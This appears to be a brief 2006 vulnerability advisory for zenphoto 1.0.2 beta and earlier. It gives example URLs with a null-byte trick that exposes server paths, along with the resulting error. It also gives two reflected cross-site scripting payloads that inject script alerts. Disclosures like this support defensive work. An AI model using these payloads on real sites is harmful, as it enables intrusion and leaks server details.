![[zone14]](/images/logo.png){kind=logo}
Vendor: zenphoto
Vulnerable: zenphoto 1.0.2 beta and below
Bugtraq ID: 17779
CVE reference:
Release date: 2006-10-11
Path Disclosure
http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAGE_NAME&s=thumb%00
which returns:
Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85...
Cross Site Scripting
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME&image=EXISTING_IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3Eaaaa
Solution
Edit the code.